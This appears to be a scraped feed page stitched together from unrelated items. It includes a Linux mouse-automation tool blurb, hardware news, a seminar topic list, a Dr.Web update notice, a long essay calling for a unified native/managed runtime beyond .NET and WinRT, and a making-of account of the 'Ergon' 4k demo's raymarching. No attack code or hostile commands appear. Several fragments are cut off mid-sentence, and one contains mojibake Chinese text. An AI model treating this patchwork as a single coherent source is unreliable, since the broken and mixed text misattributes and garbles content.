Whether you are using Linux on a single- or multiple-monitor computer, every pixel on your monitor is defined by X and Y co-ordinates. On a basic single-monitor Linux computer, the value of the X co-ordinate starts at the left-hand side and increases to the right. Similarly, the value of the Y co-ordinate starts at the top and increases towards the bottom of the screen. Together, the total number of pixels defines the screen resolution.

This Linux mouse automation software displays the X and Y co-ordinates of the mouse cursor at the top right corner. To understand the co-ordinates, just move the mouse cursor around the screen and watch the X and Y values change in the software.

To click at some location on the screen automatically with this Linux automation software, you need to specify the X and Y co-ordinates of that particular location. Separate edit boxes are provided on the software's main screen to capture the X and Y co-ordinates. To fill them in, you can use a system-wide keyboard shortcut: a key combination (configurable from the software's settings) that works even when this Linux automation tool does not have focus. Just move the mouse cursor to the desired location and press the shortcut key to automatically enter the screen location in the edit boxes provided. Configure the other parameters and then press the Add Click button to store the mouse click in the list of mouse clicks to automate.

desktop automation utility - QT version

Version: 0.71.2

AutoKey is a desktop automation utility for Linux and X11. It allows you to manage a collection of scripts and phrases, and assign abbreviations and hotkeys to these. This allows you to execute a script or insert text on demand in whatever program you are
          å°¤åˆ©å¡ 对《Linux主机上如何设置使用自定义php.ini》的评论        
待到深入研究 自定义php.ini 时再用一下……
     摘要: tomcat运行php的几种方式  é˜…读全文

疯狂 2011-06-16 15:04 发表评论

          Comment on Operating Systems and File Systems Cross-Compatibility: Windows, Apple, Linux, Playstation, xBox, Android by Graham Gawthorpe        
This blog post shows the situation but says nothing about a solution for the incompatibility.
          Taking a snapshot of a Managed Disk        
We talked about Managed Disks; now let's use them. Let's snapshot a Managed Disk and restore the snapshot on another VM. Deploy ARM Template: we used the resource group named md-demo-snapshot. This deploys a single Linux VM into a managed availability set using a premium managed disk. The deployment takes a few minutes. Customize VM […]
          Kaspersky Anti-Virus Support        
Kaspersky Anti-Virus support, as the name suggests, is a program developed by Kaspersky Lab. It has been certified for Windows 7 as well. It is a good anti-virus program that protects users from malware. There is also a version that runs on Linux for business customers. It has the ability to do [...]
          Joining an ARM Linux VM to AAD Domain Services        
Active Directory is one of the most popular domain controller / LDAP server around. In Azure we have Azure Active Directory (AAD).  Despite the name, AAD isn’t just a multi-tenant AD.  It is built for the cloud. Sometimes though, it is useful to have a traditional domain controller…  in the cloud.  Typically this is with […]
          Italians overclock Pentium 4 to 8.18 GHz        

Italians overclock Pentium 4 to 8.18 GHz

WHILE FERRARI WAS soundly beaten by British machinery last weekend in Monaco, the Italians did their best to keep their pride up'n'running. This time, ThuG and his fellow members from OC Team Italy pushed their platinum-sample Pentium 4 631 to a massive 8.18 GHz, making all those old-time gamedevs sweat with dreams of what could have been. If the record is true, hats off, lads.

OverclockersClub tested the BenQ FP222WH, a 22" LCD widescreen monitor that sells for a modest $269.99 US. Honestly, if you are thinking about a new monitor, this one just sounds like a dream. I remember when I bought my 22" iiyama Vision Master Pro. The dealer gave me a hefty discount, so I ended up paying only 2,300 US dollars. Today, you get the same screen size (albeit at a little lower resolution) for almost 10 times less, and I bought that iiyama in 2000.

Bit-Tech tested Corsair DDR3-1333 modules, which come in Dominator format (of course, with their tri-fan DHX cooling). Since benchmark results are less than stellar, the guys gave a conservative conclusion. The time for DDR3 will come, though.

And for those who do not want to spend massive amounts of money on a new memory standard and an appropriate motherboard but still want the best - Legit Reviews tested OCZ's PC2-9200 Reaper Edition memory.

HardwareSecrets tested MSI's GeForce 8500GT, a board that targets the entry-level market.

Overclockers from Down Under tested another silent graphics card, but this time around we are talking about Gigabyte's take on the 8600GTS.

Virtual-Hideout tested the Antec P182 aluminium case, a probable choice for the select few who will be able to afford it. However, this case packs a serious punch for those who intend to install multiple graphics cards or hot CPUs.

In the meantime, Ocworkbench managed to get hold of AMD's RD790 motherboard and ran four boards in CrossFire. This board will be all over Computex in more flavours than one, so brace for impact. All we know is that AMD roadmaps claim this chipset comes with PCI Express 2.0, an industry first.

Phoronix decided to do a deep dive and compared ATI drivers under the Ubuntu and Windows operating systems. With Ubuntu even available as a live CD, you should give Linux a try - Phoronix gives the lowdown for owners of ATI hardware.

CoolTechZone came up with a review of the iRiver S10. Yes, somebody other than the Fruity Company still makes MP3 players. And this one makes the iPod shuffle look like a giant.

          Techview podcast for RadioTux #135: Plasma Active Two (Linux on tablets)        
          VLC Player Coming To Android In "A Matter Of Weeks"        

The incredibly popular VLC Player is finally coming to Android after months of hard work by the open source project's developers. Originally a desktop media player for Linux, Windows, and Mac, this versatile player will bring many new video-playing features to our beloved OS, including support for a wide variety of formats such as DivX and Dolby TrueHD. The lead developer of the project, Jean-Baptiste Kempf, has confirmed that it will hit the Android Market in "just a few weeks", which means that Android will finally follow iOS and get its own port of this software (thanks, Mikeyy).

Read More

VLC Player Coming To Android In "A Matter Of Weeks" was written by the awesome team at Android Police.

          Linuxinfotag Landau 2011 retrospective        
          Seminar Topics (100)        
Excellent Seminar/Paper Presentation Topics for Students

Enter the desired topic name in the search bar for a detailed search on that topic.

1. 4G Wireless Systems
3. Artificial Eye
4. Animatronics
5. Automatic Teller Machine
6. Aircars
7. Adding intelligence to Internet using satellites
9. Aeronautical Communications
10. Agent oriented programming
11. Animatronics
12. Augmented reality
13. Autonomic Computing
14. Bicmos technology
16. Biomagnetism
17. Biometric technology
19. Boiler Instrumentation
20. Brain-Computer Interface
21. Bluetooth Based Smart Sensor Networks
22. BIBS
23. CDMA Wireless Data Transmitter
24. Cellonics Technology
25. Cellular Positioning
26. Cruise Control Devices
27. Crusoe Processor
28. Cyberterrorism
29. Code division duplexing
30. Cellular Digital Packet Data
31. Computer clothing
32. corDECT WLL
35. CDMA
55. CVT
56. Delay-Tolerant Networks
58. DiffServ-Differentiated Services
59. DWDM
60. Digital Audio Broadcasting
61. Digital Visual Interface
62. Direct to home television (DTH)
80. DSL
81. DTM
82. DWDM
86. Embedded system in automobiles
87. Extreme Programming
88. EDGE
90. E BOMB
          Ubuntu Linux now on Windows Store        
Today, we're excited to announce that Canonical's Ubuntu Linux Distro is now available in the Windows Store and can be downloaded and installed on any Windows Insider build >= #16215! Eventually this will be available to all regular Windows 10 users.
          What's the difference?        
Here is the logo of a Montreal public-relations firm. And here is that of the GNU/Linux distribution Debian. So where is the difference? 
          Update of the certified version of Dr.Web Enterprise Security Suite        

August 3, 2017

Doctor Web announces the completion of inspection control for the version of Dr.Web Enterprise Security Suite certified by FSTEC of Russia (certificate of conformity No. 3509 of January 27, 2016). The procedure addressed vulnerability Z-2016-02373, extended the list of supported operating systems (support for AstraLinux 1.5 was added), and optimized the set of component modules without changing functionality.

To receive the update, change the update zone to /update/fstek2017feb in the web interface of the Dr.Web Control Center. Users of the certified version can obtain the updated Dr.Web distributions, as well as the updated product data sheet, by contacting Doctor Web's technical support service.

If the integrity of the downloaded files needs to be verified, checksums can be computed with the "Уровень-1" ("Level-1") algorithm and compared with the checksums listed in the file "КС установочных файлов после ИК" (installation-file checksums after inspection control).

The update of Dr.Web Security Space, Dr.Web Anti-virus, and Dr.Web Anti-virus for Windows file servers will proceed automatically but will require the computers to be rebooted.

          Going Native 2.0, The future of WinRT        
In recent years, we have seen a lot of fuss about the return of "going native" after the managed era popularized by Java and .NET. When WinRT was revealed last year, there were some shortsighted comments claiming that ".NET is dead" and glorifying the comeback of C++ as the one true way to develop an application, while at the same time JIT compilation was spreading through the scripting world (JavaScript being one of its most prominent users). In the end everything goes native anyway; the difference is the length of the path to native code and how optimized the result is. Still, the meaning of the word "native" has slightly shifted to become strongly and implicitly coupled with the word "performance". Even as a strong advocate of managed languages, I concede that their performance is indeed below that of a well-written C++ application. So should we just accept this fact and get back to work in C++, with things like WinRT as the backbone of the interop? To tell you the truth, I want .NET to die, and this post is about why and for what.

The Managed Era

Let's begin by revisiting the recent history of managed development, which will highlight the current challenges. Remember the Java slogan? "Write once, run everywhere." It introduced a paradigm in which a complete "safe" single-language stack, based on a virtual machine and a large set of APIs, would let developers easily build an application targeting any platform/OS. It was the beginning of the "managed" era. While Java was adopted quite successfully in several industries, it was also rejected by many developers who were aware of its memory-management caveats and of a JIT that was not as optimized as it should have been (though it saw impressive improvements over the years), along with a tremendous number of bad design choices: the lack of native structs and unsafe access, and the extremely laborious and inefficient route to native code through JNI (and even recently they were considering getting rid of all native types and making everything an object; what a terrible direction!).

Java also failed at the heart of its slogan: it was in fact not possible to embrace, in a single unified API, the idioms of each target platform/OS, leading to things like Swing, not exactly an optimal UI framework. Also, from the beginning Java was designed with a single language in mind, though many people saw the JIT/bytecode as an opportunity to port scripting languages to the JVM.

Around the time of early Java, Microsoft tried to enter the Java market by integrating some custom language extensions (with the end of that story well known) and finally came up with its own managed technology, which was in several respects better conducted and designed: bytecode designed from the ground up, unsafe constructs, native interop, a lightweight but very efficient JIT plus NGEN, rapid evolution of the C# language, C++/CLI, and so on, taking multi-language interop into account from the beginning and without the burden of the Java slogan (though Silverlight on macOS and Moonlight were a good try).

Both systems share a similar managed monolithic stack: metadata, bytecode, JIT and GC are tightly coupled. Performance-wise it is also far from perfect: the JIT implies a startup cost, and the executed code is not as fast as it should be, mainly because:
  1. The JIT performs poor optimization compared to a full C++ -O2 pass, because it needs to be fast when generating code (also, unlike Java's HotSpot JVM, the .NET JIT cannot hot-swap existing JIT-compiled code for better-optimized code).
  2. Managed types such as arrays always check bounds on access (except in simple loops where the JIT can suppress the check when the loop limit is at most the array's length).
  3. The GC can pause all threads to collect objects (though the new GC in 4.5 made some improvements), which can cause unexpected slowdowns in an application.
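The cost in point 2 can be illustrated in C++, with `vector::at()` standing in for the checked managed array access and `operator[]` for the raw native access; this is only an analogy, not actual JIT output:

```cpp
#include <cassert>
#include <stdexcept>
#include <vector>

// Checked access: a compare + branch on every element, like a CLR array.
int sum_checked(const std::vector<int>& a) {
    int s = 0;
    for (std::size_t i = 0; i < a.size(); ++i)
        s += a.at(i);            // bounds-checked on each access
    return s;
}

// Unchecked access: the loop bound already proves i < size(),
// exactly the pattern where the .NET JIT can elide the check.
int sum_unchecked(const std::vector<int>& a) {
    int s = 0;
    for (std::size_t i = 0; i < a.size(); ++i)
        s += a[i];               // no per-access check
    return s;
}
```

Both functions return the same result; the difference is only the per-access check, which is what the JIT tries, and often fails, to remove.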
But even with this performance deficiency, a managed ecosystem with its comprehensive framework is the king of productivity and language interop, with decent overall performance for all the languages running inside it. The apogee of the managed era was probably around the launch of Windows Phone and Visual Studio 2010 (which uses WPF for its rendering, though WPF itself is built on top of a lot of native code), when managed languages were the only authorized way to develop an application. That was not the best thing that could have happened, considering the long list of pending issues with .NET performance; it was enough to stimulate all the "native coders" to strike back, and they were absolutely within their rights.

It turns out that this somewhat marked the "decline" of .NET. I don't know much about Microsoft's internal organization, but it is commonly reported that there is serious competition between divisions, good or bad. As for .NET, for the past few years Microsoft has seemed to be running out of gas (for example, almost no significant improvements in the JIT/NGEN, and many pending requests for performance improvements, including things like SIMD that have been requested for a long time), and my guess is that the required changes could only take place within a global strategy, with deep support and commitment from all divisions.

In the meantime, Google was starting to push its NativeClient technology, which allows sandboxed native code to run from the browser. Last year, in this delirious going-native trend, Microsoft revealed that even the HTML5 implementation in the next IE was going native! Sic.

In "Reader Q&A: When will better JITs save managed code?", Herb Sutter, one of the "Going Native" evangelists, provides some interesting insights into what the "Going Native" philosophy thinks about JITs, with lots of inaccurate facts; but let's just focus on the main one: even if JITs could improve in the future, managed languages made such a choice of safety over performance that they are intrinsically doomed never to play in the big leagues. Miguel de Icaza posted a response in "Can JITs be faster?" in which he explains why several of Herb Sutter's statements were misleading.

Then WinRT came along to somewhat smooth the lines. By taking part of the .NET philosophy (metadata and some common "managed" types like strings and arrays) and the good old COM model (as a common denominator for native interop), WinRT tries to solve the problem of language interoperability outside the CLR world (thus without the performance penalties for C++) and to provide a more "modern" OS API. Is this the definitive answer, the one that will rule them all? So far, not really. It is heading in the direction of a convergence that could lead to great things, but it is still uncertain whether it will take the right track. And what could this "right track" be?

Going native 2.0, Performance for All

Though safety rules can have a negative impact on performance, managed code is not doomed to be run by a poor JIT compiler (for example, Mono can run C# code natively compiled through LLVM on iOS/Linux), and it would be fairly easy to extend the bytecode with more "unsafe" levels to provide fine-grained performance speedups (like suppressing array bounds checking, etc.).

But the first problem that can be identified today is the lack of a strong cross-language compiler infrastructure. This ranges from the compiler used in the IE10 JavaScript JIT, to the .NET JIT and NGEN compilers, to the Visual C++ compilers (to name a few), all using different code for almost the same laborious and difficult problem of generating efficient machine code. Having a single common compiler is a very important step toward providing high-performance code accessible from all languages.

Felix9 on Channel9 found that Microsoft may actually be working on this problem, which is good news, but "performance for all" is only a small part of a bigger picture. In fact, the previously mentioned "right track" is a broader integrated architecture, not just an enhanced LLVM stack but one backed by Microsoft's experience in several fields (C++ compilers, JIT, GC, metadata, etc.): a system that would expose a completely externalized and modularized "CLR" composed of:

  • An intermediate mid-level language, entirely queryable/reflectable, very similar to LLVM IR or .NET bytecode, defining common datatypes (primitives, string, array, etc.). An API similar to System.Reflection.Emit should be available. Vectorized (SIMD) types should be first-class types just as int and double are. This IL should not be limited to CPU targets but should allow GPU computing (similar to AMP): it should be possible to express HLSL bytecode in this IL, with the benefit of leveraging a common compiler infrastructure (see the following points). Typeless IL should also be possible, to let dynamic languages be expressed more directly.
  • A dynamic linked library/executable format, like assemblies in .NET, providing metadata and IL code, query/reflection friendly. When developing, code should be linked against assemblies/IL code (and not against crappy C/C++ headers).
  • An IL-to-native-code compiler, which could be integrated into a JIT, an offline or cloud compiler, or a mixed combination. This compiler should provide vectorization whenever the target platform supports it. IL code would be compiled to native code at install/deploy time, based on the target machine architecture (at development time, this could be done after the whole application has been compiled to IL). The compiler stages should be accessible from an API and offer extension points as much as possible (access to IL-to-IL optimization, or pluggable IL-to-native transforms). The compiler would be responsible for global program optimization at deploy time (or at runtime in JIT scenarios). Optimization options should range from fast compilation (like a JIT) to aggressive (offline, or hot-swapped code in a JIT). A profile of the application could also be used to automatically tune localized optimizations. The compiler should support advanced JIT scenarios, such as dynamic hotspot analysis and on-stack replacement (OSR, which allows heavy computation code to be replaced at runtime by better-optimized code), unlike the current .NET JIT, which only compiles a method on its first run. This kind of optimization is really important in dynamic scenarios where type information is sometimes discovered late (as in JavaScript).
  • An extensible allocator/memory component allowing concurrent allocators, of which the garbage collector would be one implementation. The major part of an application would use the GC to manage most of its objects' lifecycles, leaving the most performance-critical objects to be managed by other allocator schemes (like the reference-counting scenarios used by COM/WinRT). There would be no restriction on using different allocator models in the same application (and this is already what happens when a .NET application deals with native interop and allocates objects using OS functions).
The philosophy is very similar to a CLR stack, except that it doesn't force an application to be run by a JIT compiler (yes, there is NGEN in .NET, but it was designed for startup time, not for high performance; plus it is a black box that only works on assemblies installed into the GAC) and it allows mixed GC/non-GC memory allocation scenarios.
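The coexistence of allocator policies described above can be sketched with a tiny C++ interface. All the names here are invented for illustration; this is not a real CLR or WinRT API, just the shape of "one interface, several concurrent lifetime policies":

```cpp
#include <cstdlib>
#include <vector>

// Hypothetical allocator interface: the GC would be one implementation,
// reference counting or arenas would be others, all usable side by side.
struct Allocator {
    virtual void* allocate(std::size_t size) = 0;
    virtual void release(void* p) = 0;   // may be a no-op for a collector
    virtual ~Allocator() = default;
};

// Policy 1: immediate free, standing in for ref-counted COM-style lifetime.
struct MallocAllocator : Allocator {
    void* allocate(std::size_t size) override { return std::malloc(size); }
    void release(void* p) override { std::free(p); }
};

// Policy 2: an arena that owns every block and frees them all at once,
// standing in for a collector that decides lifetime itself.
struct ArenaAllocator : Allocator {
    std::vector<void*> blocks;
    void* allocate(std::size_t size) override {
        void* p = std::malloc(size);
        blocks.push_back(p);
        return p;
    }
    void release(void*) override {}      // lifetime is managed by the arena
    ~ArenaAllocator() override {
        for (void* p : blocks) std::free(p);
    }
};
```

A program could hand performance-critical objects to the malloc-style policy while everything else lives in the collected one, which is the mixed scenario the paragraph describes.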

In this system, full native interoperability between languages would be straightforward, without sacrificing performance for simplicity or vice versa. Ideally, an OS should be built from the ground up on such a core infrastructure. This is probably what was (is?) behind projects like Redhawk (for the compiler part) or Midori (for the OS part); in such an integrated system, probably only drivers would require some kind of unsafe behavior.

[Update 9 Aug 2012: Felix9 again found that an intermediate bytecode, lower level than MSIL, called MDIL, could already be in use, and that it could be the intermediate bytecode mentioned just above. Looking at the related patent "INTERMEDIATE LANGUAGE SUPPORT FOR CHANGE RESILIENCE", though, there are some native x86 registers in the specs that don't fit well with an architecture-independent bytecode. Maybe they will keep MSIL as-is and build on a lower-level MDIL. We will see.]

So what is WinRT tackling in this big picture? Metadata, a bit of sandboxed API, and an embryo of interoperability (through common datatypes and metadata); as we can see, not that much, a basic COM++. And as we can plainly observe, WinRT cannot provide advanced optimizations in scenarios where we use a WinRT API: for example, we cannot have a plain struct that exposes inlinable methods. Every method call in WinRT is a virtual call, forced to go through a vtable (and sometimes several virtual calls are needed, for example when a static method is used), so even a simple property get/set goes through a virtual call. This is clearly inefficient. It looks like WinRT is only targeting coarse-grained APIs, leaving all the fine-grained APIs at the mercy of performance heterogeneity and restricting common scenarios where we want access to high-performance code everywhere, without going through a layer of virtual calls and non-inlinable code. Using an extended COM model is not what we can call "building the future".

Productivity and Performance for C# 6.0

A language like C# would be a perfect candidate for such a modular CLR system and could be mapped easily to the intermediate bytecode above. But to use such a system efficiently, C# should be improved in several respects:
  • More unsafe power, letting us turn off "managed" behaviors like array access checking (a kind of "super unsafe mode" where we could, for instance, use CPU prefetch instructions before accessing the next array elements, "advanced" stuff that is impossible with current managed arrays without unsupported tricks).
  • A configurable new operator that would integrate different allocator schemes.
  • Vectorized types (like HLSL float4) should be added to the core types. This has been requested for a long time (with ugly patches in XNA on Windows Phone to "solve" the problem).
  • Lightweight interop to native code (assuming we would still be calling native code from C#, unlike in an integrated OS): the current managed-to-unmanaged transition is costly when calling native methods, even without any "fixed" variables. An unsafe transition should be possible without the burden of the x86/x64 prologue/epilogue that the current .NET JIT generates for the unmanaged transition.
From a general language perspective, not strictly related to performance, there are lots of small areas that would be important to address as well:
  • Generics everywhere (in constructors, in implicit conversions) with more advanced constructs (constraints on operators, etc.), closer to C++ template versatility but safer and less cluttered.
  • Struct inheritance and finalizers (to allow lightweight code to be executed on exit from a method, without going through the cumbersome "try/finally" or "using" patterns).
  • More metaprogramming: allow static method extensions (not only for "this"); allow class mixins (mixing the content of one class into another, useful for things like math functions); allow modification of class/type/method construction at compile time (for example, methods called at compile time to add methods/properties to a class, very similar to eigenclasses in Ruby metaprogramming, instead of using things like T4 template code generation); and, more extensively, allow DSL-like syntax extensions at several points in the C# parser (Roslyn currently provides no extension points inside the parser) so that we could express language extensions in C# as well (for example, instead of having the LINQ syntax hardcoded, we should be able to write it as a parser extension plugin, fully written in C#). [Edit] I have posted a discussion, "Meta-Programming and parser extensibility in C# and Roslyn", about what is intended behind this metaprogramming idea on the Microsoft Roslyn forum. Check it out! [/Edit]
  • A built-in symbol or link type with which we could express a link to a language object (a class, a property, a method) using a simple construction like symbol LinkToMyMethod = @MyClass.MyMethod; instead of using LINQ expressions (like (myMethod) => MyMethod inside MyClass). This would make code using INotifyPropertyChanged more robust and would simplify all property-based systems like WPF (which currently requires an ugly duplication of the method definition).
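For illustration only, C++ pointers to members already give a rough feel for such a symbol/link type: they name a member without a string and without duplicating its definition. The `Person`/`get` names below are invented for the sketch:

```cpp
#include <string>

// A type whose members we want to "link" to, as a property system would.
struct Person {
    std::string name;
    int age = 0;
};

// A generic accessor taking a member "link", roughly what a symbol type
// would let a binding or INotifyPropertyChanged-style system do safely.
template <typename T, typename M>
M get(const T& obj, M T::*link) {
    return obj.*link;   // follow the member link on this object
}
```

Usage looks like `auto LinkToAge = &Person::age;` followed by `get(p, LinkToAge)`, which is close in spirit to the proposed `symbol LinkToMyMethod = @MyClass.MyMethod;`.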
The bottom line is that there is less to add to C# than there is to remove from C++ to fully leverage such a system and greatly improve developer productivity, again without sacrificing efficiency. One could argue that C++ already offers all of this and much more, but that is exactly why C++ is so cluttered (syntax-wise) and dangerous for the vast majority of developers: it allows unsafe code everywhere, while unsafe code is always localized in an application (and is always a source of memory corruption, so it is much easier to fix when it is clearly identified and strictly localized in the code, just as with the asm keyword in non-standard C/C++). It is easier and safer to track exceptional usages in a large codebase than to allow them everywhere.


We can hope that Microsoft took a top-down approach, addressing a unified OS API for all languages and simple interoperability first, and that they will introduce these more advanced features in a later version of their OS. But this is an ideal expectation, and it will be interesting to see whether Microsoft effectively takes up this challenge. It was recently revealed that WP8 .NET applications will benefit from cloud compilers, but so far we don't know much about them: is it just a repackaging of NGEN (which is, again, not performance oriented, generating code very similar to the current JIT) or a non-public Redhawk compiler?

Microsoft has lots of gold in its backyard, with years of advanced native code compilation in its C++ compiler, JIT, GC, and all the related R&D projects...

So to summarize this post: .NET must die into a better integrated, performance-oriented common runtime where managed (safety/productivity) versus native (performance) is no longer a border, and this should be a structural part of the next evolution of the WinRT architecture.
          Making of Ergon 4K PC Intro        
You are not going to discover any fantastic trick here, and the intro itself is not an outstanding coding performance, but I always enjoy reading the making-of of other intros, so it's time to put this one on paper!

What is Ergon? It's a small 4k intro (meaning a 4096-byte executable) that was released at the 2010 Breakpoint demoparty (if you can't run it on your hardware, you can still watch it on YouTube), and which, surprisingly, finished in 3rd place! I did the coding and design and also worked on the music with my friend ulrick.

It was a great experience, even if I didn't expect to work on this production at the beginning of the year... but at the end of January, when BP2010 was announced and supposed to be the last one, I was motivated to go there and, why not, release a 4k intro! A month and a half later, the demo was almost ready... wow, three weeks before the party, the first time I finished something so far ahead of an event! I was able to work on it part time during the week (and at night, of course)... But when I started, I had no idea where this project would take me... or even which 3D API to start from for this intro!

OpenGL, DirectX 9, 10 or 11?

At FRequency, xt95 mainly works in OpenGL, mostly because he is a Linux user. All our previous intros were done in OpenGL, although I provided some help on a few of them and bought OpenGL books a few years ago... I'm not a huge fan of the OpenGL C API, but more importantly, in my short experience I was always able to strip down DirectX code size better than OpenGL code... At that time I was also working a bit more with the DirectX API... I had even bought an ATI 5770 earlier to be able to play with the D3D11 compute shader API... I'm also mostly a Windows user... DirectX has very well integrated documentation in Visual Studio, a good SDK with lots of samples, a cleaner API (more true of the recent D3D10/D3D11), and some cool tools like PIX to debug shaders... I also thought that programming with DirectX on Windows might reduce the risk of incompatibilities between NVidia and ATI graphics cards (although I found that, at least with D3D9, this is not always true...).

So OK, DirectX was selected... but which version? I started my first implementation with D3D10. I know the code is much more verbose than D3D9 and OpenGL 2.0, but I wanted to practice this somewhat "new" API a bit more rather than just read a book about it. I was also interested in putting some text into the demo, and tried an integration with the latest Direct2D/DirectWrite API.

Everything went well at the beginning with the D3D10 API. The code was clean, thanks to the thin layer I developed around DirectX to make the coding experience much closer to what I am used to in C# with SlimDX, for example. The resulting C++ code was something like this:
// Set VertexBuffer for InputAssembler Stage
device.InputAssembler.SetVertexBuffers(screen.vertexBuffer, sizeof(VertexDataOffline));

// Set TriangleList PrimitiveTopology for InputAssembler Stage
device.InputAssembler.SetPrimitiveTopology(PrimitiveTopology::TriangleList);

// Set VertexShader for the current Pass
device.VertexShader.Set(pass.vertexShader);
Very pleasant to develop with. But because I wanted to test D2D1, I switched to D3D10.1, which can be configured to run on D3D10 hardware (via the feature-level mechanism)... So I also started to lightly wrap the Direct2D API and was able to produce some really nice text very easily... but wow... the code was a bit too large for a 4k (though it would be perfect for a 64k).

Then, during this experimentation phase, I tried the D3D11 API with the compute shader... and found the code to be much more compact than D3D10 if you are doing something like, for example, raymarching. I didn't compare code sizes, but I suspect it could compete with its D3D9 counterpart (although there is a downside in D3D11: if you can afford real D3D11 hardware, a compute shader can render directly to the screen buffer... otherwise, using the D3D11 compute shader at feature level 10, you have to copy the result from one resource to another... which might eat into the size benefit...).

I was happy to see that the switch to D3D11 was easy, with some continuity from D3D10 in the API's look and feel... although I was disappointed to learn that combining D3D11 and D2D1 was not straightforward, because D2D1 is only compatible with the D3D10.1 API (which you can run at feature levels 9.0 to 10), forcing you to initialize and maintain two devices (one for D3D10.1 and one for D3D11) and to play with DXGI shared resources between the devices... wow, lots of work, lots of code... and of course out of the question for a 4k...

So I tried... plain old D3D9... and that was of course much more compact in size than its D3D10 counterpart... So for around two weeks in February, I played with those various APIs while implementing a basic scene for the intro. I just had a bad surprise when releasing the intro, because lots of people were not able to run it: weird, because I had tested it on several NVidia cards and at least my ATI 5770... I didn't expect D3D9 to be so sensitive to this, or at least to be a bit less sensitive than OpenGL... but I was wrong.

Raymarching optimization

I decided to go for an intro using a raymarching algorithm, which was more likely to deliver "fat" content in a tiny amount of code, even though raymarching was already somewhat passé after the fantastic intros released in 2009 (Elevated - not really a raymarching intro, but so impressive!, Sult, Rudebox, Muon-Baryon, etc.). But I didn't have enough time to explore a new effect and was not confident I could find anything interesting in the time available... so... OK, raymarching.

So for one week, after building a first scene, I spent my time trying to optimize the raymarching algorithm. There was an instructive thread about this on Pouët: "So, what do distance field equations look like? And how do we solve them?". I tried to implement some tricks like...
  1. Generating a grid in the vertex shader (with 4x4-pixel cells, for example) to precompute a raw view of the scene, storing the minimal distance to march before hitting a surface... then letting the pixel shader take those interpolated distances (multiplied by a small reduction factor like 0.9f) and perform fine-grained raymarching with fewer iterations
  2. Generating a pre-rendered 3D volume of the scene at much lower density (like 96x96x96) and using this map to navigate the distance field, while still performing some "sphere tracing" refinement where needed
  3. A kind of level of detail on the scene: for example, instead of doing a texture lookup (for the "bump mapping") at each step of the raymarching, letting the raymarcher use a simplified analytical version of the scene and switching to the more detailed one for the last steps
Well, I have to admit that none of these techniques was really clever in any way... and the results matched that lack of cleverness! None of them provided a significant speedup compared to the code-size hit they generated.

So after one week of optimization, I just went back to a basic raymarching algorithm. The shader was developed under Visual C++, integrated into the project (thanks to NShader syntax highlighting). I wrote a small C# tool to strip shader comments, remove unnecessary spaces, and so on, integrated into the build (pre-build events in VC++). It's really enjoyable to work with this toolchain.
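For reference, the basic sphere-tracing loop looks something like this, sketched in C++ rather than HLSL; the scene (a single unit sphere) and all the constants are invented for the illustration:

```cpp
#include <cmath>

struct Vec3 { float x, y, z; };

static float length3(Vec3 v) {
    return std::sqrt(v.x * v.x + v.y * v.y + v.z * v.z);
}

// Signed distance to the scene: here, a sphere of radius 1 at the origin.
static float sceneSDF(Vec3 p) { return length3(p) - 1.0f; }

// Sphere tracing: the distance field tells us how far we can safely step
// along the ray without skipping through a surface.
float raymarch(Vec3 origin, Vec3 dir) {
    float t = 0.0f;
    for (int i = 0; i < 128; ++i) {
        Vec3 p{origin.x + t * dir.x, origin.y + t * dir.y, origin.z + t * dir.z};
        float d = sceneSDF(p);
        if (d < 0.001f) return t;   // close enough: we hit a surface
        t += d;                     // safe step = distance to nearest surface
        if (t > 100.0f) break;      // ray left the scene
    }
    return -1.0f;                   // miss
}
```

In the real intro this loop lives in the pixel shader, with the SDF describing the whole scene instead of one sphere.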

Scenes design

For the scenes, I decided to use the same kind of technique as the Rudebox 4k intro: leaning on the geometry and lights rather than on the materials. That made the success of Rudebox, and I was motivated to build some complex CSG with boolean operations on basic elements (box, sphere, etc.). The nice thing about this approach is that it avoids any kind of if/then/else inside the iso-surface to determine the material... just placing the lights properly in the scene can do the work. Indeed, Rudebox is essentially a scene with a white material on every object; what makes the difference is the position of the lights in the scene, their intensity, and so on. Ergon uses the same trick.
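The boolean operations on distance fields mentioned here boil down to min/max on the primitive distances. A C++ sketch (the primitives and the example scene are invented; in the intro this lives in the shader):

```cpp
#include <algorithm>
#include <cmath>

struct Vec3 { float x, y, z; };

// Distance to a sphere of radius r at the origin.
static float sphere(Vec3 p, float r) {
    return std::sqrt(p.x * p.x + p.y * p.y + p.z * p.z) - r;
}

// Distance to an axis-aligned box with half-extents b.
static float box(Vec3 p, Vec3 b) {
    float dx = std::fabs(p.x) - b.x;
    float dy = std::fabs(p.y) - b.y;
    float dz = std::fabs(p.z) - b.z;
    float ox = std::max(dx, 0.0f), oy = std::max(dy, 0.0f), oz = std::max(dz, 0.0f);
    return std::sqrt(ox * ox + oy * oy + oz * oz) +
           std::min(std::max({dx, dy, dz}), 0.0f);
}

// CSG on distance fields: union, intersection, subtraction.
static float opUnion(float a, float b)     { return std::min(a, b); }
static float opIntersect(float a, float b) { return std::max(a, b); }
static float opSubtract(float a, float b)  { return std::max(a, -b); }

// Example: a box with a sphere carved out of its center.
float scene(Vec3 p) {
    return opSubtract(box(p, {1.0f, 1.0f, 1.0f}), sphere(p, 1.2f));
}
```

Chaining a handful of these operators is enough to build fairly complex shapes, which is why the approach is so size-efficient in a 4k.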

I spent around two to three weeks building the scenes. I ended up with four scenes, each quite cool on its own, with a consistent design across them. One of the scenes used fonts to render a wall of text through the raymarcher.

Because I wasn't sure I would be able to use all of those scenes, well, I'm going to post their screenshots here!

The first scene I developed, during my D3D9/D3D10/D3D11 API experiments, was a massive tentacle model coming out of a black hole. All the tentacles were moving around a weird cut sphere with a central "eye"... I was quite happy with this scene, which had a unique design. From the beginning, I wanted to add some post-processing to enhance the visuals and make them a bit different from other raymarching scenes... So I went with a simple post-process that drew some patterns on the pixels, added a radial blur to produce "ghost rays" coming out of the scene, darkened the corners, and added a small flickering that grows toward the corners. This piece of code alone already cost as much as a scene, but that was the price of a genuine ambiance.

The colors and theming were almost settled from the beginning... I'm a huge fan of warm colors!

The 2nd scene coupled font rendering with the raymarcher: a kind of flying flag, with the FRequency logo appearing from left to right with a light on it (I will probably release those effects on pouet just for the record). That was also a fresh use of raymarching; I hadn't seen anything like it in recent 4k productions, so I was expecting to keep this text in the 4k, as it's not so common. The code to use the D3D font was not too fat, so I was still confident I'd be able to use those 2 scenes.

After that, I was looking for some nasty objects... so for the 3rd scene, I played randomly with some weird functions and ended up with a kind of "raptor" creature. I also wanted to use a weird generated texture I had found a few months earlier, which was perfect for it.

